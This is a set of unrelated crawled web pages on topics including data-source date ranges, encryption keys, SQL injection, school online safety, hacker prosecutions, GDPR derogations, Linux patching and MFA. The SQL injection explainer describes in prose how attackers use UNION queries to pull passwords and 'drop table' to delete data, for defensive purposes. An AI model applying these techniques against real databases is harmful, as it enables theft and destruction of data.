yyyy-MM-ddis the pattern for <year (4 digits)>-<month in year (2 digits)>-<day in month (2 digits)>. E.g., “2014-01-31”.
This parameter can be a literal or an interpolation variable.
Start date: initial date of the date range. This value has to follow the pattern specified in the first parameter of the function. It can be a literal or an interpolated variable.
End date: finish date of the date range. This value has to follow the pattern specified in the first parameter of the function. It can be a literal or an interpolated variable.
Pattern of the file names: pattern of the file names. This parameter can be a literal or an interpolated variable.
When using this function, follow these two rules:
The literal parameters of the
DateRangefunction have to be surrounded by double quotes. With this function you cannot use single quotes.
You cannot leave any space between the parameters of the
Let us say that the
C:/logs directory contains the log files
generated daily by an application. The name of these files follows the
To create a data source that reads all the logs of January 2014, set the path of the data source to the following:
Note that the value of the first parameter (
yyyy/MM/dd) is the
pattern followed by the start date and end date parameters of the
A base view created over this data source will return the data “in
order”. That is, the data source reads the file of the data range, which
is the first of January (
reads the file of the next day (
then the file of the next day (
At runtime, if one of the files of the date range is missing and “Ignore route
errors” check box is not selected, the query will return an error but it will
also return the contents of all the files it found. For example, if the file
application_log_2014-01-15.log does not exist, a query to this data source
will return an error message that explains the situation, but the result will
contain the data read from all the other files. I.e.
In the previous example, the date range of the files was fixed and it
could not be changed at runtime. If you want this range to be dynamic,
you can set the
start date and
end date parameters to be
interpolation variables. E.g.
The base views created over this data source will have two extra fields
end_date whose value will set the date
range. For instance, the following query
SELECT * FROM bv_application_log WHERE start_date = '01/01/2014' AND end_date = '03/31/2014'
will make the data source to process the log files of the first quarter of 2014.
Note that when a parameter is an interpolation variable, you do not have to add double quotes.
^DateRange can also be used with paths that point to directories
instead of a group of files.
For instance, if the logs of each day are stored in a separate directory
with the naming convention
yyyyMMdd, set the path of the data source
The base views created over this data source will read all the files from every directory in the specified date range. | <urn:uuid:4a9733be-c5c8-4a20-b6d1-43d7cdfd46bf> | CC-MAIN-2022-40 | https://community.denodo.com/docs/html/browse/7.0/vdp/administration/creating_data_sources_and_base_views/delimited_file_sources/delimited_file_sources | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00561.warc.gz | en | 0.778842 | 4,430 | 2.78125 | 3 |
A private key (or “secret key”) is a variable that is used with an algorithm for encrypting messages between parties to a private conversation.
In symmetric cryptography, also called secret key cryptography, the same closely-held key is used by both parties to encrypt and decrypt messages. The two share knowledge of the encryption scheme, for example ROT13, and they use this to decipher messages that have had the plaintext rotated 13 characters forward in the alphabet.
In public-key cryptography (PKC), also called asymmetric cryptography, there are two different but mathematically-related keys. The public key is made widely available to both parties, and a private key is held only by a user—only one of them. The public key is used for encryption and the private key is used for decryption. Key sharing that is simple makes PKC a sensible system for modern applications since it is scalable, although PKC is more computing resource-intensive than symmetric cryptosystems.
“In symmetric cryptography, where the users both have a private key for encryption and decryption, the private key is a closely-held mutual secret. These kinds of systems are fast and efficient, however, the requirements for distributing keys securely is challenge that sometimes calls for a key-distribution method that is different than the encryption scheme used for the actual conversations.” | <urn:uuid:83793f62-84cd-427f-b0e3-4901524b1b8d> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/private-key | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00561.warc.gz | en | 0.949355 | 287 | 4.28125 | 4 |
SQL is short for Structured Query Language and usually pronounced as “sequel.” SQL is a standard language used to query and change the content of databases. It was originally designed to perform business analyses. But with the implementation of product-specific application programming interfaces (API) and the growth of online applications, it quickly became more widely used.
Consider, for example, searching for a certain item in a big online store. What happens behind the scene is an SQL query on the databases containing products, pricing, and stock. And if you’re logged in as a customer, it might even include some of your preferences.
Example of a SQL query in a webstore
SQL injection is something that can happen when you offer the website visitors the option to initiate a SQL query without applying validation of the input. The effects are potentially horrible, since SQL injection might destroy your database or give the attacker access to parts of the database that you do not want publicly known. Attackers could be after personally identifiable information of your customers or the list of your suppliers.
While the most common use of SQL injection is for web applications, this is certainly not the only type of application that is vulnerable to these attacks. Basically, anything that asks for user input and uses a SQL-based database could be compromised this way without proper validation of the input, regardless of whether the input is stored in the database or initiates a query.
SQL injection is possible when the attacker applies any kind of code injection technique. These possibilities are called vulnerabilities because it makes the application vulnerable to nefarious SQL statements being inserted into an entry field and executed as commands. To execute a SQL injection, the attacker has to find and exploit a security vulnerability in an application, such as when user input is incorrectly filtered for string literal escape. This filtering is what we call validation. The input can be expected to have a certain format and should be rejected or sanitized if it does not match our expectations.
Above is a greatly exaggerated example of completely unfiltered php code. The input from the “name” field on the website goes straight into the SQL query. In this code, we can’t see what happens with the result of the query, but often it will be displayed in some form on the site. And with a little bit of trial and error, the attacker could retrieve the administrator's username and change his password just by entering a string of valid SQL commands in the “name” field. That is why we call it SQL injection. An attacker can squeeze in his own strings of code.
Possible goals of the attack
There are several reasons why an attacker would use SQL injection.
- Destruction: For whatever reason, the attacker wants to put the application or site out of business. You may have seen developers use the “drop table” when making fun of SQL-related accidents. The “drop table” command followed by the name of one of the tables in the database will make it delete the entire table with that name. Rebuilding such a table will be time-consuming—if it is possible in the first place.
- Stealing information: Data breaches, anyone? The impact to your company is, at a minimum, the loss of trust of your customers and could completely put you out of business.
- Feeding false information: An attacker could raise his credit or lead you to make business decisions based on false information. Both could cost you dearly.
- Taking over control: An attacker that has control over your database may want to feed you false information, deny your access, or remove valuable information.
Knowing what the attackers are after and which methods are used to attack should help you to prevent successful attacks.
For example, a common method to steal passwords is to trick your search results into displaying them. The only thing the attacker needs to do is see if there are any submitted variables used in SQL statements that they can pass unfiltered. These filters can be set to customize WHERE, ORDER BY, LIMIT, and OFFSET clauses in select statements. The union operator is used to combine the result-set of two or more select statements. If your database supports this construct, the attacker might try to add an extra query to the original one. This query could be used to list passwords or usernames. On top of sanitizing input, using encrypted password fields is another defensive weapon you can use.
Encrypting important data and building some filters to validate the input goes a long way. Obviously, the method of validation depends on the application itself and the coding language. Methods of attack that work in PHP might fail in ASP, for example. Excluding certain characters that are unexpected and/or irrelevant in a text field is a good start.
Is it more important to accommodate the customer who wants to be addressed as Mr. & Mrs. Jones or to avoid the risk of an attacker happily being able to use the “&&” symbols that are a valid command in SQL queries and many coding languages. It doesn’t have to be one or the other, by the way. You can accept the input of such characters as long as you make sure they are dealt with before they are added to the query commands.
SQL injection is the placement of unauthorized code into SQL statements and is one of the many web attack mechanisms used by hackers to steal data. It is perhaps one of the most common application layer attacks. Knowing what attackers are after and what methods they are using can help you protect your business from these types of attacks. | <urn:uuid:2259be2d-0d4b-48b7-9d05-752796995ea7> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2018/03/explained-sql-injection | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00561.warc.gz | en | 0.941406 | 1,149 | 3.40625 | 3 |
It's that time of year again when parents are slowly gearing up for a new school term. Some schools have a strict policy of only using their own pre-approved lab devices, while others allow students to bring their own devices (BYOD). Whatever the plan, it's never too early to start thinking about some of the potential dangers.
Following the herd
When new schoolmates collide, there's always a mad dash to join the collective and sign up to a bunch of popular websites. I'm sure many parents are intimately familiar with the "I want to set up a YouTube channel because my friend has one" request, followed closely by your own concerns about connected accounts, public-facing settings, and whether or not little Jimmy has uploaded 30 minutes of dabbing in front of the underwear dryer.
Spend some time going over privacy basics, like avoiding recording anything too identifiable. Don't leave letters lying around in shots with home addresses on them or upload footage of yourself standing outside your house across the street from well-known public locations.
Digital devices are great tools for education, but there's no harm in admitting they can be a problematic time suck at the worst possible moments. Students love spending time on their mobile phones, tablets, gaming consoles, and computers going down the YouTube rabbit hole or playing their favorite video games. And while videos and games can offer some educational benefits, parents will want to keep an eye on age-appropriateness, time spent in front of the screen, and potential in-game/video purchases that can be easily activated without parental consent.
It isn't just schools in Australia, but schools in the UK, too, who've been sending out letters about the incredibly popular game Fortnite. The letters contain advice on limiting digital playtime via parental controls, as well as password security basics to thwart scammers attempting to pilfer accounts.
Give precedence to digital assignments that must be completed while allowing for some free screen time outside of schoolwork. And make sure to school your children on password-protecting all of their devices for additional security.
A little vanity searching never hurt anyone
It's not enough for your kids to avoid posting their own personally identifiable information online; they should occasionally see what others might be posting about them, too. If a school bully is able to figure out your address and decides to post it online, you'd never know about it unless you heard from a friend.
Smart searching can save the day, and help to get the offending information taken down. This may be something you choose to do yourself rather than burden the child with additional responsibilities.
Security can be fun
You don't need to wait until school time to give your kids some security tips. In fact, it might be more advantageous for them to head into the new school year with some decent computing knowledge, and it'll certainly impress teachers, too.
With education as a top target for cybercriminals, especially those behind dangerous threats such as the Emotet Trojan and ransomware, it's important for parents and students to be aware of the ways they can accidentally help threat actors breach school defenses. We've written a lot about engaging children with infosec, and our post on this subject will be useful whether you're a parent, educator, or both.
Kids and the written word
There's a lot of advice guides out there for parents, and though the books may not be specific to schooling, many of the tips within remain valid. Consider choosing a few titles on the subject of digital literacy, citizenship, or cybersecurity, and brush up your own knowledge on the latest issues affecting kids in cyberspace. Online popularity, social media, and (especially) anything to do with gaming should be your first port of call where learning is concerned...they're all magnets for children and any associated problem points.
Networks and nopeworks
If the school devices are of the fixed, pre-approved types that never leave the classroom, tell your children not to save anything particularly personal to them, outside of whatever schoolwork is required. You don't want a batch of their selfies or bad emo poetry (we've all done it) being stored on some obscure portion of the school network. Even if devices can be brought home, there's a good chance they may have some sort of monitoring and/or logging functionality onboard, so it pays to be cautious and avoid potential trouble further down the line.
The same goes for student-initiated installs on the device. Whether the school has a liberal install policy or the devices are totally on lockdown, it's probably a good idea to always ask whoever is responsible for IT before installing something. The school may have its own internal portal where safe, approved apps live. Randomly grabbing downloads from Google Play, or turning off the "no installs from unknown sources" option could give everybody involved a massive headache.
It isn't just the school that wants to keep an eye on your children's computer use; this may be something you want to do as well. If that's the case, we've written about how you can approach the potentially tricky subject of monitoring with your kids. Remind them: with great power (unfettered access to the Internet) comes great responsibility.
School social networks
Many schools have their own social portals for their students, and they act in a similar way to more well-known services. If your child is on one of these portals, make sure they're using a strong, unique password, and understand the security/privacy settings of the network. As above, they should avoid posting anything too identifiable, and should refrain from cyberbullying their classmates.
On a similar note, some schools will issue devices to students and leave much of the security in the hands of the laptop recipient. If that's the case, we've got you covered with some schooltime 101 security lockdown tips.
Acceptable use policies
A school network without one of these would be a rare thing, so you may wish to request a copy of the AUP and see exactly what can, or can't, be done while using the net on school time. If your child has a habit of, er, breaking the rules, then it might be an idea to talk over any of the most important points. Nobody wants to get kicked out of school for (what the child might think) is the silliest rule.
Ring the bell!
With our quickfire list of tips and links, both you and yours should be ready to roll when term time comes around. Going back to school can be a grind for older kids, and incredibly daunting for younger ones. Throw some technology into the mix and anything can happen, so it's good to know a wealth of online resources exist for those willing to get their feet wet.
Speaking of, if you'd like even more advice on how to tackle tech and security concerns with your kids, take a look at Malwarebytes' Director of Malware Intelligence Adam Kujawa's live stream on the topic. Hint: Fast forward to about the six minute mark for the video to begin.
Unfortunately, we can't tell you which sofa the school uniform is stuffed down, but we're right here for all your computing-related needs. Wishing you all a productive and safe return to school! | <urn:uuid:79f7ebf1-67be-4e7b-8ff2-516d5bd57fb7> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2018/08/back-to-school-hints-tips-and-links | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00561.warc.gz | en | 0.958417 | 1,499 | 2.671875 | 3 |
Given that computer hacking is at least three decades old, there has been plenty of time for governments to develop and approve cybercrime laws. At the moment, almost all developed countries have some form of anti-hacking law or legislation on data theft or corruption which can be used to prosecute cyber criminals. There are efforts to make these laws even more stringent, which sometimes raise protests from groups which support the right to freedom of information.
Over the past few years, there have been lots of convictions for hacking and unauthorized data access. Here are a few of them:
- Kevin Mitnick is probably the one of the most famous hacker takedown cases. Mitnick was arrested by the FBI in Raleigh, North Carolina, on February 15th, 1995, after the computer expert Tsutomu Shimomura managed to track him to his hideout. After pleading guilty to most of the charges brought against him, Mitnick was sentenced to 46 months in prison and three years probation. He was additionally sentenced to another twenty-two months for probation violation and additional charges. He was eventually released from prison on January 21, 2000.
- Pierre-Guy Lavoie, a 22-year-old Canadian hacker, was sentenced to 12 months of community service and placed on probation for 12 months for fraudulently using computer passwords to perpetrate computer crimes. He was sentenced under Canadian law.
- Thomas Michael Whitehead, 38, of Boca Raton, Florida, was the first person to be found guilty under the Digital Millennium Copyright Act (DMCA). He was prosecuted as part of the Attorney General’s Computer Hacking and Intellectual Property program and charged with selling hardware which could be used to illegally receive DirecTV satellite broadcasts.
- Serge Humpich, a 36 year-old engineer, was sentenced to a suspended prison sentence of 10 months by a ruling issued by the 13th correctional chamber. He also had to pay 12,000 francs (approx. €1,200) in fines, and symbolic damages of one franc to the ‘Groupement des Cartes Bancaires’.
- On October 10, 2001, Vasiliy Gorshkov, age 26, of Chelyabinsk, Russia, was found guilty of 20 counts of conspiracy, computer crime, and fraud committed against the Speakeasy Network of Seattle, Washington, Nara Bank of Los Angeles, California, Central National Bank of Waco, Texas; and the online payment company PayPal of Palo Alto, California.
- On July 1, 2003, Oleg Zezev, aka “Alex,” a Kazakhstan citizen, was sentenced in a Manhattan federal court to over four years (51 months) in prison following his conviction on extortion and computer hacking charges.
- Mateias Calin, a Romanian hacker, along with five American citizens, was indicted by a federal grand jury on charges that they conspired to steal more than $10 million in computer equipment from Ingram Micro in Santa Ana, California, the largest technology distributor in the world. Mateias and his network are yet to be convicted for these crimes and face up to 90 years in prison.
- On the 27 March 2006, UK couple Ruth & Michael Haephrati, convicted in Israel of developing and selling a Trojan horse program, were sentenced to prison terms of four years and two years respectively (and ordered to pay 2 million Shekels [$428,000] in compensation). They sold their Trojan to private investigators who used it to access data from clients’ business competitors.
- In a well-publicised case, British hacker, Gary McKinnon, awaits extradition to the US for hacking into 97 US military and NASA computers in 2002 – described by one US prosecutor as ‘the biggest military computer hack of all time’. His legal counsel has lodged a series of appeals and (at the time of writing in March 2010) continues to contest the extradition proceedings. If tried and convicted in the US, he faces up to 70 years in prison.
The list above is simply a brief digest which illustrates how cybercrime legislation has been used across the world against hackers or to convict cybercriminals in general. There are also some cases where people have been wrongly convicted of cybercrime. There are also numerous cases where hackers are still at liberty despite their names and identities being known. However, the number of such cases is being reduced day by day.
Cybercrime is here to stay. It is a reality of the 21st century, and the wide availability of the Internet and the insecure systems which come with it have increased the reach of cybercrime. With sufficiently sophisticated legislation, and more international cybercrime treaties such as being adopted, the world is hopefully heading in the right direction, with the long term aim being a safer, more law-abiding cyberspace. | <urn:uuid:97a2b260-8a6e-4320-85f3-11df1d0a5c2e> | CC-MAIN-2022-40 | https://encyclopedia.kaspersky.com/knowledge/hackers-and-the-law/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00561.warc.gz | en | 0.968821 | 984 | 2.828125 | 3 |
Being a teacher has always been a tough job. Taking on the role means accepting responsibility for the potential of young people and embracing the many, various challenges on the path to their future. Time evolves the medium of these challenges, but not the content. The teachers of today still face the issues of bullying and fighting against a tide of inattention in much the same way as their predecessors. In 2017, however, teachers are working against smartphones and the digital world rather than pieces of paper and fisticuffs.
Social media is proving to be one of the areas that causes the most disruption for teachers trying to educate their pupils today. Nominet’s recent research (opens in new tab) into the impact of social media and the use of smartphones in the classroom found that secondary school teachers lose an average of 17 minutes teaching time every day to disruptions stemming from these – that’s over 11 days each year. This is not only short-changing our kids but each school’s potential too.
The difficulty in handling this growing problem is that the students of today have grown up within a digital world and largely rely on social media to operate within it. Social media platforms offer them a place to express themselves and discover who they are and who they want to be through online exploration and engagement.
The internet also supports their learning. Recent Barnardo’s research (opens in new tab) found that 75% of 13-15 year olds use the net to help with homework – more than the previous generation. Unfortunately, the study also found that 25% of them had used social media to communicate with a stranger.
Sites such as Twitter, Facebook and Instagram struggle to keep pace with the negative aspects that result from use of their platforms: cyberbullying, online abuse, and the sharing of sexually explicit content. Not only are these issues damaging online for the youngsters, they also leak out from the digital world into the real one. They form the foundation of many of the problems teachers are expected to handle in the classroom.
Another alarming by-product of social media use is the negative way in which it impacts mental health. The NSPCC (opens in new tab) has established links between social media use and an increase in the likelihood of issues such as anxiety and depression despite the apparent lifeline it offers to adolescents. Our own research concurred, reporting that 57% of all teachers surveyed think social media has negatively affected their students’ mental health. This has serious consequences at a pivotal time in their lives: half of teachers believe social media contributes to their pupils achieving lower grades than their potential. These are just two good reasons why almost three-quarters (72%) of teachers think smartphones should be banned from the classroom completely.
For all the negative associations and issues, social media is here to stay. Young people know no other realm for communication and sharing. They will always find a way of using the online tools, even if schools try to control it. A case in point comes from one of England’s leading independent schools that admitted to monitoring its students’ comments on social media to check for criticism of the school, prompting protests (opens in new tab) from the students themselves.
To move forward, we need to consider how we make the social media impact positive as far as possible in the school environment. This starts with offering teachers training and support to ensure they feel confident to educate their pupils on social media issues. Teachers must be armed with coping strategies for cyber bullying and impress upon their students the serious consequences of creating or sharing explicit content. We know this is an area that needs work as our research found that almost a quarter of teachers believe they lack the right skills to cope. This is despite 17% of teachers saying they’d experienced pupils sharing explicit or pornographic content in class. In future, schools might need to invest in training or consider hiring qualified staff to manage the challenges associated with social media use and abuse both in and out the classroom.
Coping with existing issues is the first step; the next is knowing how to harness social media for good in a school context. Schools are increasingly using sharing platforms to broadcast updates to parents on everything from school trips to unplanned closures. Within reason, there could also be positive use of platforms in the classroom, with simple steps such as incorporating sites like Facebook into lesson plans. This is great for closed group class projects and sharing relevant research and ideas. There is also evidence, from a study at the University of Kansas (opens in new tab), that students learnt a scientific process better than their peers when their learning was supported by social media. That said, teachers must bear in mind the official age restrictions for the social media platforms (13 for Facebook, Instagram and Twitter), even if their students likely don’t.
To support these efforts at school, there needs to be an active interest from Mum and Dad at home too. We found that 84% of the teachers believe they need the help of parents to ensure children understand the risks they take by living online. The best results in this endeavour will come from a collaborative effort; parents, teachers and friends working together to keep our children safe and, hopefully, reduce the negative impact of social media in the classroom.
The challenges of our digital age should be viewed as opportunities and not problems. Social media could become a tool for transformation in the learning environment if everyone works together, upskilling as necessary and investing their efforts in supporting the young people trying to find their way across sharing platforms as they come of age. This is the future generation of leaders and we owe them every chance to make the digital world one which they can navigate safely and thrive within.
For more information on Nominet’s teacher research please visit our website (opens in new tab).
Russell Haworth, CEO of Nominet (opens in new tab)
Image Credit: Syda Prodcutions / Shutterstock | <urn:uuid:70a1d173-0b70-4f88-b8d2-2c3981aeb37d> | CC-MAIN-2022-40 | https://www.itproportal.com/features/teachers-vs-kids-social-media-and-smartphones/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00561.warc.gz | en | 0.96553 | 1,200 | 3.203125 | 3 |
One of the primary goals of the General Data Protection Regulation (GDPR) is to harmonize data protection laws across the European Union (EU). However, under the GDPR, EU Member States are allowed some flexibility to add or modify certain provisions of the GDPR to fit their local needs and laws. In total, there are over 50 provisions, which allow GDPR derogations by Member States.
Locating the GDPR Derogations
These GDPR derogations and exemptions exist primarily in two main areas — Article 23 and Articles 85-91.
Article 23 – Restrictions
Article 23 allows for Member States to introduce measures in specific situations. For instance, from transparency obligations and data subject rights, including in the interest of national security, prevention and detection of crime, freedom of expression, professional secrecy, the processing of employee data and other situations. But this GDPR derogation is permitted only where it “respects the essence of the fundamental rights and freedoms and is a necessary and proportionate measure in a democratic society to safeguard” these interests.
Articles 85-91 – Provisions relating to specific processing situations
Articles 85-91 include a variety of GDPR derogations, exemptions and powers for Member States to impose additional requirements on various specific types of processing activities, such as:
Processing for journalistic, academic, artistic or literary purposes, processing of personal data in official documents held by public bodies (Article 85);
Processing of national identification numbers (Article 87);
Processing in the employment context (Article 88);
Processing for archiving, scientific, historical research or statistical purposes (Article 89); and
Processing in the context of churches and religious associations (Article 91).
Other GDPR Derogations
Other areas where Member States have the option to deviate from, or supplement, the default rules set out in the GDPR include:
Adding rules regarding processing based on the legal bases of “necessary for compliance with a legal obligation” and “necessary for the performance of a task carried out in the public interest or in the exercise of official authority vested in the controller” (Article 6(2));
Lowering the age of consent in relation to the provision of information society services from 16 years to as low as 13 years (Article 8(1));
Prohibiting the use of explicit consent of data subjects as a legal basis for processing special categories of personal data (Article (9)(2));
Adding further conditions or limitations on the processing of genetic, biometric or health-related data (Article 9(4));
Requiring controllers to consult with and obtain prior authorization from supervisory authorities when processing is for the performance of a task carried out by the controller in the public interest (including processing in relation to social protection and public health) (Article 36(5));
Requiring controllers and/or processors to designate a data protection officer (DPO) in specific additional circumstances (Article 37(4));
Setting limits on international data transfers, in the absence of an adequacy decision, and where important for reasons of public interest (Article 49(5));
Granting additional powers to supervisory authorities (Article 58(6)); and
Making rules on whether and to what extent administrative fines may be imposed on public authorities and bodies (Article 83(7)).
In addition to these optional GDPR derogations, there are also specific provisions which require Member States to take action to supplement the GDPR, such as:
Providing by law for the establishment, structure and organization of supervisory authorities Article (54);
Making rules on other penalties for infringements, in particular for those not already subject to administrative fines (Article 84(1));
Reconciling data protection rights under the GDPR with the right to freedom of expression and information, including processing for journalistic, academic, artistic and literary purposes (Article 85); and
Providing for exemptions or derogations from Chapters II-VII and IX, with respect to processing carried out for journalistic, academic, artistic or literary purposes, if they are necessary to reconcile data protection rights with freedom of expression and information (Article 85(2).
To better understand these GDPR derogations, let’s examine the new laws enacted in Germany and Austria.
GDPR Derogations in Member State Legislation
Germany was the first EU Member State to enact a law designed to supplement the GDPR. The law itself will repeal the current Federal Data Protection Law in Germany, and includes an Amendment Act designed to supplement the GDPR.
The new law contains comprehensive rules on the processing of employee data and further specifies the GDPR’s requirement that consent be voluntary. It also allows for the processing of special categories of personal data in the employment context where such processing is required to exercise rights or comply with obligations under employment law, social law or social protection law, so long as there is no overriding interest of data subjects.
Further, under Article 4(11) of the GDPR, one of the requirements for consent to be valid is that it be freely given, and due to the unbalanced nature of the employment relationship, it is unclear whether consent can be freely given in this context. Under the new German law, however, consent may be considered freely given in the employment context in certain circumstances. For example, when the employee achieves some legal or economic advantage, or if the employer and the employee have the same interests.
The law also expands upon Article 6 of the GDPR by allowing for personal data to be processed for additional purposes that are incompatible with the original purpose, if it “is necessary to assert, pursue, or defend civil law claims” of the controller, so long as it is not overridden by the interests of data subjects. The law goes further in restricting data subject rights as well. For example, data controllers will not be required to fulfill a right of access request if the personal data is stored only for compliance with statutory or contractual retention obligations, or solely for the purpose of data security and data protection control. The right of erasure (“right to be forgotten”) is also restricted if erasure of the personal data would require an unreasonably high effort due to the specific type of storage.
The law also takes advantage of the flexibility found in Article 37(4) of the GDPR given to Member States to specify instances in which controllers and/or processors must designate a data protection officer (DPO). Specifically, the GDPR derogations require controllers to designate a DPO in the following circumstances:
When at least ten employees of a controller or processor regularly conduct automated processing of personal data;
When engaged in high-risk activities mandating a data protection impact assessment (DPIA) under Article 35 of the GDPR; or
When engaged in the processing of personal data on a commercial basis for the purposes of market or opinion research.
The law also includes criminal sanctions and increased prison sentences (up to three years) for violations of certain provisions. For example, for intentionally transferring or making available a large number of personal data, without authorization, to third parties with intent to make a profit.
Austria is the second country to enact a national law to supplement the GDPR. However, unlike Germany, Austria’s law takes a more limited approach to GDPR derogations.
The new law lowers the age at which a minor can consent to the processing of their personal data in relation to information society services without parental consent to 14 years old. The default set by the GDPR is age 16, but leeway is given to Member States to lower this to as low as 13.
It is yet to be seen how this will affect data controllers, but it is likely to present a challenge for the providers of these information society services in multiple Member States if they have different age limits to comply with. For instance, Germany opted not to change the age of consent; therefore, the default age of 16 set by the GDPR will apply. However, many other countries have proposed GDPR derogations to lower the age, including Finland, who proposed lowering the age to either 13 or 15; Ireland, to 13; and the UK to 13.
Another interesting area to note about the Austrian law is that it applies not only to natural persons (like the GDPR and other privacy laws), but to legal persons as well — a wording found in Austria’s constitutional right to data protection. This provision of the law is in direct contradiction with the GDPR, which applies only to the processing of personal data of natural persons. Therefore, this could potentially make for an interesting conflict of laws.
The law also provides that personal data relating to criminal convictions and offences may be processed on the legal basis of legitimate interests of the controller. This is significant given that Article 10 of the GDPR limits the processing of this category of data to instances where “under the control of official authority,” unless authorized by Member State law such as this. Controllers who use CCTV systems to monitor their facilities or who operate whistleblowing hotlines will thus be able to process this data in the legitimate interests of security. It will be interesting to see whether other Member States follow suit in exercising this GDPR derogation, as lobbying efforts to fill gaps like this are expected.
How to prepare for GDPR derogations
Organizations should take the following steps to prepare for applicable GDPR derogations implemented by Member States:
1. Identify Requirements
The first step is to determine which EU Member State jurisdictions are applicable to your organization’s processing activities. Therefore, it will be critical to have a solid understanding of your data — what types of personal data is collected (e.g., special categories), where the data is located, and where data subjects reside. Work already done on Article 30 data mapping initiatives will be incredibly useful here, as the information detailed in those records can be leveraged for these purposes.
2. Fill Gaps
After identifying what EU Member State laws apply, you can then begin a gap analysis to understand what work you need to do to update your various policies, procedures and business processes to ensure compliance with those applicable laws. In some areas, such as age of consent for processing related to information society services, standardization will not be possible due to the GDPR derogations, and thus flexibility in how personal data is processed will be needed, i.e., how you process a German data subject’s personal data may need to be different from how you process the personal data of an Austrian data subject.
3. Keep Things Current
So far, only two Member States have enacted laws to supplement the GDPR, but the others are close behind with their own GDPR derogations. It is also inevitable that amendments to these laws will take place. Therefore, it will be imperative to keep track of these changes, and ensure that your policies, procedures and business processes are flexible to change. | <urn:uuid:a49ce310-1af7-4d17-a073-c5d7f7efb021> | CC-MAIN-2022-40 | https://www.cpomagazine.com/data-protection/gdpr-derogations-prepare-member-state-variation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00561.warc.gz | en | 0.91758 | 2,236 | 2.640625 | 3 |
As an open-source operating system (OS), Linux, which has grown to roughly 20 million lines of source code, not surprisingly requires a significant and ongoing number of patches.
Linux needs a lot of patches
As an open-source platform, the majority of the work is performed by the Linux community, encompassing thousands of programmers from around the world.
While this level of collaboration reaps amazing benefits, it also results in even more patching issues than usual.
Linux: A very brief history
Linux traces its roots back to 1964 and the development of Multics by M.I.T., GE, and Bell Labs (AT&T). When Bell labs pulled out in 1969, two employees, Ken Thompson and Dennis Ritchie, created Unix.
Through the coming years, Unix spawned Berkeley Software Distribution, the GNU Project, and MINIX. Each had its own limitations and restrictions which led Linus Torvalds to create Linux in 1991, sending his now famous message to the minix newsgroup on Usenet.
In the 25+ years since, Linux has evolved dramatically and many well-known companies such as Dell, Hewlett Packard, and IBM all invest in and profit from Linux by validating and selling Linux on their own servers. Other companies, including RedHat, Ubuntu, and SUSE manage their own enterprise distributions.
It is easy to see how quickly Linux patching can become complicated depending on who you are using to support your Linux servers.
Everyone know how complicated Windows patching is and the headaches created by WSUS, and that is a single company. Linux, with its plethora of options, presents patching complications all its own.
Linux patching complications
While Microsoft has the edge in patching support, patching Linux has historically had very few third-party options to manage patches.
You could handle them manually (not recommended) by visiting your vendor (RedHat, SUSE, etc…) site, downloading the package, run the package manager and related scripts and commands, and hope you don’t run into additional requirements. If you don’t have unlimited time and resources, another option is to use the built in updating processes, but they are typically inefficient and become more difficult when you have other dependencies or scheduling requirements.
Looking at third-party options, even as recently as a couple of years ago, centralizing Linux patch management meant you had to use configuration management systems like Puppet or Chef.
While these solutions technically work, they tend to be overly complex solutions for patching.
Most SysAdmins don’t have the programming experience, let alone the time required to create the programs necessary to efficiently patch a scalable Linux network.
How to simplify Linux patch management
Finally, there is a simple, straightforward solution for Linux patching that not only handles Linux, but also works with Windows and Mac.
Automox’s cloud-based SaaS has made Linux patching manageable whether you have one Linux server or one thousand.
Our revolutionary platform automatically identifies devices that have fallen out of patch compliance and applies required patches – with no effort on your part.
Broad Linux support along with a constant cycle of policy-based evaluation and remediation sets Automox apart. By simply adding the Automox OS Agent to your Linux endpoints you will instantly generate a full inventory view along with a complete list of deployed software.
Automox for Easy IT Operations
Automox is the cloud-native IT operations platform for modern organizations. It makes it easy to keep every endpoint automatically configured, patched, and secured – anywhere in the world. With the push of a button, IT admins can fix critical vulnerabilities faster, slash cost and complexity, and win back hours in their day.
Grab your free trial of Automox and join thousands of companies transforming IT operations into a strategic business driver. | <urn:uuid:73dc937b-2ee8-4fa7-ac83-fc936e5b448f> | CC-MAIN-2022-40 | https://www.automox.com/blog/linux-patching-made-easy | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00561.warc.gz | en | 0.935731 | 790 | 2.890625 | 3 |
Multi-Factor AuthenticationGRIDINSOFT TEAM
Multi-Factor Authentication or MFA is a user identification that requires the user to provide two or more identity verification factors to access a resource. This can be an application, an Internet account, or a VPN. MFA is a core component of a strict Identity and Access Management (IAM) policy. The primary goal of MFA is to create a layered defense that will prevent an unauthorized person from accessing a target, such as a physical location, computing device, network, or database. Even if one factor is compromised, an attacker still has at least one or more barriers to overcome before successfully penetrating a target.
Why is MFA used?
One of the most significant disadvantages of traditional login with a user ID and password is that passwords can be easily compromised, costing organizations millions of dollars. In addition, brute force attacks are a real threat, as attackers can use automated tools to crack passwords. Thus, the program will try different combinations of usernames and passwords until it finds the correct sequence. Hackers still have many other ways to access the system, even if the targeted security system locks an account after several incorrect login attempts. This is why multifactor authentication is so important, as it can help reduce security risks.
How Does MFA work?
In a classic scheme, users need to enter their username and password when they log into an account. In the case of multifactor authentication, the system will prompt them to verify their identity, usually with several options available. These might include sending a one-time password (OTP) via SMS or an authentication app, or the special app to enter biometric information such as a fingerprint or facial scan. Some corporate organizations may want users to authenticate with a physical token, such as a key or reader card. Many corporate MFA solutions also support adaptive authentication. This type of authentication makes it easier for users to gain access to critical systems without compromising account security.
What are the types of MFA?
